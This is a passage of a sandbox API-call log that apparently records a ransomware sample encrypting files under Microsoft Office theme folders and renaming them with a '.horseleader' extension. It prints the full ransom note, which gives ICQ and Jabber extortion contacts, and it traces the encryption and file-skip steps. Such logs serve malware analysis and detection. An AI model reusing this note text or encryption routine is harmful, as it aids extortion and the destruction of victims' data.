lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.193] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.193] CloseHandle (hObject=0x1a4) returned 1 [0246.193] GetProcessHeap () returned 0x780000 [0246.193] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.193] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.horseleader") returned 93 [0246.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.horseleader")) returned 1 [0246.194] GetProcessHeap () returned 0x780000 [0246.194] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.194] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x80f1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.194] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.195] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\#Decrypt#.txt") returned 82 [0246.195] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.195] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.195] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.197] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.197] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.197] CloseHandle (hObject=0x158) returned 1 [0246.197] GetProcessHeap () returned 0x780000 [0246.197] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.197] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BLUEPRNT", cAlternateFileName="")) returned 1 [0246.197] lstrcmpiW (lpString1="BLUEPRNT", lpString2="Windows") returned -1 [0246.197] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT") returned 68 [0246.197] lstrcmpW (lpString1="BLUEPRNT", lpString2=".") returned 1 [0246.197] lstrcmpW (lpString1="BLUEPRNT", lpString2="..") returned 1 [0246.197] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.198] GetProcessHeap () returned 0x780000 [0246.198] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.198] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*") returned 70 [0246.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.199] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.199] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\.") returned 70 [0246.199] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.199] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.200] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\..") returned 71 [0246.200] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.200] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.200] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f3db00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe7f3db00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xda86, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLUEPRNT.ELM", cAlternateFileName="")) returned 1 [0246.200] lstrcmpiW (lpString1="BLUEPRNT.ELM", lpString2="Windows") returned -1 [0246.200] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM") returned 81 [0246.200] StrStrIW (lpFirst="BLUEPRNT.ELM", lpSrch=".horseleader") returned 0x0 [0246.200] lstrcmpW (lpString1="BLUEPRNT.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.200] lstrcmpW (lpString1="BLUEPRNT.ELM", lpString2="_uninstalling_.png") returned 1 [0246.200] lstrlenW (lpString=".testttjffg") returned 11 [0246.200] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM", lpSrch=".testttjffg") returned 0x0 [0246.200] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.200] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.200] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.201] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM") returned 81 [0246.201] StrStrW (lpFirst="BLUEPRNT.ELM", lpSrch=".txt") returned 0x0 [0246.201] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=55942) returned 1 [0246.201] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.204] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.204] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.205] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.205] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.205] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.206] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3a86, lpOverlapped=0x0) returned 1 [0246.206] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffc57a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.206] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3a86, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3a86, lpOverlapped=0x0) returned 1 [0246.206] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.206] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.206] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.207] CloseHandle (hObject=0x1a4) returned 1 [0246.207] GetProcessHeap () returned 0x780000 [0246.207] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.207] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM.horseleader") returned 93 [0246.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.elm.horseleader")) returned 1 [0246.208] GetProcessHeap () returned 0x780000 [0246.208] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.208] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5fbc5df0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x225, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLUEPRNT.INF", cAlternateFileName="")) returned 1 [0246.208] lstrcmpiW (lpString1="BLUEPRNT.INF", lpString2="Windows") returned -1 [0246.208] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF") returned 81 [0246.208] StrStrIW (lpFirst="BLUEPRNT.INF", lpSrch=".horseleader") returned 0x0 [0246.208] lstrcmpW (lpString1="BLUEPRNT.INF", lpString2="#Decrypt#.txt") returned 1 [0246.208] lstrcmpW (lpString1="BLUEPRNT.INF", lpString2="_uninstalling_.png") returned 1 [0246.208] lstrlenW (lpString=".testttjffg") returned 11 [0246.209] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF", lpSrch=".testttjffg") returned 0x0 [0246.209] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.209] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.209] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF") returned 81 [0246.211] StrStrW (lpFirst="BLUEPRNT.INF", lpSrch=".txt") returned 0x0 [0246.211] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=549) returned 1 [0246.211] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x225, lpOverlapped=0x0) returned 1 [0246.212] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffddb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.213] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x225, lpOverlapped=0x0) returned 1 [0246.213] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.213] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.213] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.213] CloseHandle (hObject=0x1a4) returned 1 [0246.214] GetProcessHeap () returned 0x780000 [0246.214] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.214] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF.horseleader") returned 93 [0246.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\blueprnt.inf.horseleader")) returned 1 [0246.217] GetProcessHeap () returned 0x780000 [0246.217] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.217] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x785, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.217] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.217] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 80 [0246.218] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.218] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.218] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.218] lstrlenW (lpString=".testttjffg") returned 11 [0246.218] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.218] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.218] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.219] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 80 [0246.219] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.219] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1925) returned 1 [0246.219] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x785, lpOverlapped=0x0) returned 1 [0246.221] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff87b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.221] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x785, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x785, lpOverlapped=0x0) returned 1 [0246.221] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.222] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.222] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.222] CloseHandle (hObject=0x1a4) returned 1 [0246.222] GetProcessHeap () returned 0x780000 [0246.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.222] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.horseleader") returned 92 [0246.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common 